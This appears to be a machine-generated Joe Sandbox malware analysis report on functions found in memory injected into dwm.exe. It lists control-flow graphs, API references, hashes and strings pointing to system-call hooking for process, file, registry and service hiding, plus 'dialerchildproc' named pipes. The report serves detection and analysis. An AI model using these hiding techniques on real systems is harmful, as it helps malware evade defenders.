                                                    Non-executed Functions

                                                    Function 0000026DB16E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 575 26db16e2b2c-26db16e2ba5 call 26db1702ce0 578 26db16e2bab-26db16e2bb1 575->578 579 26db16e2ee0-26db16e2f03 575->579 578->579 580 26db16e2bb7-26db16e2bba 578->580 580->579 581 26db16e2bc0-26db16e2bc3 580->581 581->579 582 26db16e2bc9-26db16e2bd9 GetModuleHandleA 581->582 583 26db16e2bdb-26db16e2beb GetProcAddress 582->583 584 26db16e2bed 582->584 585 26db16e2bf0-26db16e2c0e 583->585 584->585 585->579 587 26db16e2c14-26db16e2c33 StrCmpNIW 585->587 587->579 588 26db16e2c39-26db16e2c3d 587->588 588->579 589 26db16e2c43-26db16e2c4d 588->589 589->579 590 26db16e2c53-26db16e2c5a 589->590 590->579 591 26db16e2c60-26db16e2c73 590->591 592 26db16e2c75-26db16e2c81 591->592 593 26db16e2c83 591->593 594 26db16e2c86-26db16e2c8a 592->594 593->594 595 26db16e2c8c-26db16e2c98 594->595 596 26db16e2c9a 594->596 597 26db16e2c9d-26db16e2ca7 595->597 596->597 598 26db16e2d9d-26db16e2da1 597->598 599 26db16e2cad-26db16e2cb0 597->599 600 26db16e2da7-26db16e2daa 598->600 601 26db16e2ed2-26db16e2eda 598->601 602 26db16e2cc2-26db16e2ccc 599->602 603 26db16e2cb2-26db16e2cbf call 26db16e199c 599->603 604 26db16e2dbb-26db16e2dc5 600->604 605 26db16e2dac-26db16e2db8 call 26db16e199c 600->605 601->579 601->591 607 26db16e2d00-26db16e2d0a 602->607 608 26db16e2cce-26db16e2cdb 602->608 603->602 612 26db16e2dc7-26db16e2dd4 604->612 613 26db16e2df5-26db16e2df8 604->613 605->604 609 26db16e2d0c-26db16e2d19 607->609 610 26db16e2d3a-26db16e2d3d 607->610 608->607 615 26db16e2cdd-26db16e2cea 608->615 609->610 616 26db16e2d1b-26db16e2d28 609->616 617 26db16e2d4b-26db16e2d58 lstrlenW 610->617 618 26db16e2d3f-26db16e2d49 call 26db16e1bbc 610->618 612->613 620 26db16e2dd6-26db16e2de3 612->620 621 26db16e2dfa-26db16e2e03 call 26db16e1bbc 613->621 622 26db16e2e05-26db16e2e12 lstrlenW 613->622 623 26db16e2ced-26db16e2cf3 615->623 628 26db16e2d2b-26db16e2d31 616->628 630 26db16e2d7b-26db16e2d8d call 26db16e3844 617->630 631 26db16e2d5a-26db16e2d64 617->631 618->617 625 26db16e2d93-26db16e2d98 618->625 632 26db16e2de6-26db16e2dec 620->632 621->622 642 26db16e2e4a-26db16e2e55 621->642 626 26db16e2e35-26db16e2e3f call 26db16e3844 622->626 627 26db16e2e14-26db16e2e1e 622->627 624 26db16e2cf9-26db16e2cfe 623->624 623->625 624->607 624->623 636 26db16e2e42-26db16e2e44 625->636 626->636 627->626 637 26db16e2e20-26db16e2e33 call 26db16e152c 627->637 628->625 638 26db16e2d33-26db16e2d38 628->638 630->625 630->636 631->630 641 26db16e2d66-26db16e2d79 call 26db16e152c 631->641 632->642 643 26db16e2dee-26db16e2df3 632->643 636->601 636->642 637->626 637->642 638->610 638->628 641->625 641->630 647 26db16e2ecc-26db16e2ed0 642->647 648 26db16e2e57-26db16e2e5b 642->648 643->613 643->632 647->601 651 26db16e2e63-26db16e2e7d call 26db16e85c0 648->651 652 26db16e2e5d-26db16e2e61 648->652 654 26db16e2e80-26db16e2e83 651->654 652->651 652->654 656 26db16e2e85-26db16e2ea3 call 26db16e85c0 654->656 657 26db16e2ea6-26db16e2ea9 654->657 656->657 657->647 660 26db16e2eab-26db16e2ec9 call 26db16e85c0 657->660 660->647
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                    • API String ID: 2119608203-3850299575
                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction ID: fa6f1be63ba1a87b5172fed6c71b4643f27ade253310e9bd3f78bf624ab99318
                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction Fuzzy Hash: 0CB1B373B10A5882EB958F25DC487A963A6F748B8CF96521AEE095379CDF76CC40C380
                                                    Function 0000026DB16E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction ID: 673f2873fde4ad654a78d376170b3544c49daaef5f9177d58ce0c66091a65b76
                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction Fuzzy Hash: FB317C73B05B848AEB648F60E8843ED7364F794748F85412ADA4E57B98EF3AC648C750
                                                    Function 0000026DB16ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction ID: bb989dc9c6e74f8c12dad01ddb1d4c7471c85f99220278f6dc2e2b343b16ba17
                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction Fuzzy Hash: 72319F37B14B8486EB60CF25EC443AE73A4F789758F910226EA9D43B98DF39C555CB40
                                                    Function 0000026DB16E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                    • String ID: d
                                                    • API String ID: 2005889112-2564639436
                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction ID: 96382e3acaaa6827ca44e66e2646e4424fb01237ff0ffebd022b4e35471edae8
                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction Fuzzy Hash: BA516A72B00B88C6EB50CF66E94835AB7A1F389F89F454124DA4A0776CDF3EC049CB80
                                                    Function 0000026DB16E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                    • API String ID: 4175298099-1975688563
                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction ID: e992cd1b79d44f11385a7638b254574f37de9e3ee5f9028a8b74f7c8b0a2f6b7
                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction Fuzzy Hash: 1E31B1B6F00A8EE0EA01EFA9EC6D7D42321B71434CFC2521798094316D9F7A8649D7D0
                                                    Function 0000026DB16B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 417 26db16b6910-26db16b6916 418 26db16b6918-26db16b691b 417->418 419 26db16b6951-26db16b695b 417->419 421 26db16b6945-26db16b6984 call 26db16b6fc0 418->421 422 26db16b691d-26db16b6920 418->422 420 26db16b6a78-26db16b6a8d 419->420 423 26db16b6a9c-26db16b6ab6 call 26db16b6e54 420->423 424 26db16b6a8f 420->424 440 26db16b698a-26db16b699f call 26db16b6e54 421->440 441 26db16b6a52 421->441 426 26db16b6938 __scrt_dllmain_crt_thread_attach 422->426 427 26db16b6922-26db16b6925 422->427 438 26db16b6ab8-26db16b6aed call 26db16b6f7c call 26db16b6e1c call 26db16b7318 call 26db16b7130 call 26db16b7154 call 26db16b6fac 423->438 439 26db16b6aef-26db16b6b20 call 26db16b7190 423->439 430 26db16b6a91-26db16b6a9b 424->430 432 26db16b693d-26db16b6944 426->432 428 26db16b6927-26db16b6930 427->428 429 26db16b6931-26db16b6936 call 26db16b6f04 427->429 429->432 438->430 449 26db16b6b22-26db16b6b28 439->449 450 26db16b6b31-26db16b6b37 439->450 452 26db16b69a5-26db16b69b6 call 26db16b6ec4 440->452 453 26db16b6a6a-26db16b6a77 call 26db16b7190 440->453 444 26db16b6a54-26db16b6a69 441->444 449->450 454 26db16b6b2a-26db16b6b2c 449->454 455 26db16b6b39-26db16b6b43 450->455 456 26db16b6b7e-26db16b6b94 call 26db16b268c 450->456 467 26db16b69b8-26db16b69dc call 26db16b72dc call 26db16b6e0c call 26db16b6e38 call 26db16bac0c 452->467 468 26db16b6a07-26db16b6a11 call 26db16b7130 452->468 453->420 462 26db16b6c1f-26db16b6c2c 454->462 463 26db16b6b45-26db16b6b4d 455->463 464 26db16b6b4f-26db16b6b5d call 26db16c5780 455->464 474 26db16b6b96-26db16b6b98 456->474 475 26db16b6bcc-26db16b6bce 456->475 470 26db16b6b63-26db16b6b78 call 26db16b6910 463->470 464->470 485 26db16b6c15-26db16b6c1d 464->485 467->468 520 26db16b69de-26db16b69e5 __scrt_dllmain_after_initialize_c 467->520 468->441 488 26db16b6a13-26db16b6a1f call 26db16b7180 468->488 470->456 470->485 474->475 482 26db16b6b9a-26db16b6bbc call 26db16b268c call 26db16b6a78 474->482 483 26db16b6bd5-26db16b6bea call 26db16b6910 475->483 484 26db16b6bd0-26db16b6bd3 475->484 482->475 514 26db16b6bbe-26db16b6bc6 call 26db16c5780 482->514 483->485 499 26db16b6bec-26db16b6bf6 483->499 484->483 484->485 485->462 507 26db16b6a45-26db16b6a50 488->507 508 26db16b6a21-26db16b6a2b call 26db16b7098 488->508 504 26db16b6bf8-26db16b6bff 499->504 505 26db16b6c01-26db16b6c11 call 26db16c5780 499->505 504->485 505->485 507->444 508->507 519 26db16b6a2d-26db16b6a3b 508->519 514->475 519->507 520->468 521 26db16b69e7-26db16b6a04 call 26db16babc8 520->521 521->468
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                    • API String ID: 190073905-1786718095
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: bc8ba06d231906410d28f4f7c54334bc73e889378fa2e39cc6ab0f5ed57794fc
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 6A81C431F0024D86FB64AB269C4F39B62A1E7A578CF5780159E05477DEDF3BC8468780
                                                    Function 0000026DB16ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 0000026DB16ECE37
                                                    • FlsGetValue.KERNEL32(?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECE4C
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECE6D
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECE9A
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECEAB
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECEBC
                                                    • SetLastError.KERNEL32 ref: 0000026DB16ECED7
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECF0D
                                                    • FlsSetValue.KERNEL32(?,?,00000001,0000026DB16EECCC,?,?,?,?,0000026DB16EBF9F,?,?,?,?,?,0000026DB16E7AB0), ref: 0000026DB16ECF2C
                                                      • Part of subcall function 0000026DB16ED6CC: HeapAlloc.KERNEL32 ref: 0000026DB16ED721
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECF54
                                                      • Part of subcall function 0000026DB16ED744: HeapFree.KERNEL32 ref: 0000026DB16ED75A
                                                      • Part of subcall function 0000026DB16ED744: GetLastError.KERNEL32 ref: 0000026DB16ED764
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECF65
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB16F0A6B,?,?,?,0000026DB16F045C,?,?,?,0000026DB16EC84F), ref: 0000026DB16ECF76
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                    • String ID:
                                                    • API String ID: 570795689-0
                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction ID: 6000b7eeb9ad468f5d45f5329cfb4210f5d56ad6800c1cf5aeafd710c9ce63f2
                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction Fuzzy Hash: 6341B632F0034C82FE68A7359D5D37912427F947BCF964724A836476DEFE6BC8014680
                                                    Function 0000026DB16E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2171963597-1373409510
                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction ID: 9fa24eb0b23bd5ce7b3ddc3f94f69d2a51ad175b2d6da8c6bf530cee3d289606
                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction Fuzzy Hash: C8213832B14B4882EB208B25E94875A67A1F799BA8F510215EA5903BACCF7DC589CB40
                                                    Function 0000026DB16B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction ID: 7230d488e13e9c3bff1897c14ae51efb90f954d58938468ace4201149d47ef18
                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction Fuzzy Hash: 05E1D4B3B04B488AEB60DF65D88A39E77A4F74978CF110115EE8957B9DCB36C491C780
                                                    Function 0000026DB16EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction ID: 0d857b3f48ac5f5f02ab9aee0c364f11a3a66bbf5b0b0217d64f09ab64738b47
                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction Fuzzy Hash: E2E16D73B00748C6EB20DF65984839D77A0F79579CF920216EE8997B9DDB35C491CB80
                                                    Function 0000026DB16EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction ID: 07dc854bb8392e4b7756f712fbb909fe23776a23183938eecc9f735c6889463e
                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction Fuzzy Hash: A141D233B12A0882EB16CB66AD087552391F755BA8F9B46299D0E8778DEE3AC4458380
                                                    Function 0000026DB16E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                    • String ID: d
                                                    • API String ID: 3743429067-2564639436
                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction ID: 41739dc7c09b12c353673866714c1e8f7b80919bbe72c68929168c01e66acb68
                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction Fuzzy Hash: FC416F73A14B88C6E760CF21E84879E77A1F389B9DF458229DA8907B5CDF39C549CB40
                                                    Function 0000026DB16ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,0000026DB16EC7DE,?,?,?,?,?,?,?,?,0000026DB16ECF9D,?,?,00000001), ref: 0000026DB16ED087
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16EC7DE,?,?,?,?,?,?,?,?,0000026DB16ECF9D,?,?,00000001), ref: 0000026DB16ED0A6
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16EC7DE,?,?,?,?,?,?,?,?,0000026DB16ECF9D,?,?,00000001), ref: 0000026DB16ED0CE
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16EC7DE,?,?,?,?,?,?,?,?,0000026DB16ECF9D,?,?,00000001), ref: 0000026DB16ED0DF
                                                    • FlsSetValue.KERNEL32(?,?,?,0000026DB16EC7DE,?,?,?,?,?,?,?,?,0000026DB16ECF9D,?,?,00000001), ref: 0000026DB16ED0F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: 1%$Y%
                                                    • API String ID: 3702945584-1395475152
                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction ID: 4558098af6529f8cb269427dcdf3de32342bfdd93cc47970c6cfec3c098dadc3
                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction Fuzzy Hash: 90114632F0428C82FA6897359D5D37962417B547FCF9A4325A83D877DEEE6BCC428680
                                                    Function 0000026DB16E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: 1f032829c0f570dc7f4d46e8c9db4fe9fd7df05683aa1e7509ee6566a9cde374
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 50812633F1074D86FB58AB69AC4C3592390B75578CF874629EA044739EEB3BC94587C0
                                                    Function 0000026DB16E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction ID: 579c3e15a5ef922da687d2f95c73ffebc26af39e7fd6273426b778e12b48ba26
                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction Fuzzy Hash: C731A532B12748D1EE25DB56AC0875533A4BF48BA8F9B0B259E1D0B79CEF3AC545C380
                                                    Function 0000026DB16F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction ID: 1e05f97e019a81556c30052025b67a67010faf91d063785e7ae4bb4612f0f864
                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction Fuzzy Hash: 5A119D31F20B8486E7508B16EC4C31973A0F798FE9F050225EA1A877A8CF7AC914C784
                                                    Function 0000026DB16E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: dialer
                                                    • API String ID: 756756679-3528709123
                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction ID: f0abb7b4aa35662adb270250897fccec3ff0778e03e9ad59eee73927db4b912b
                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction Fuzzy Hash: 0D31D433F01B5982EB14CF1AED4872967A1FB58B88F4A42249F4847B5DEF36C4A5C780
                                                    Function 0000026DB16ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
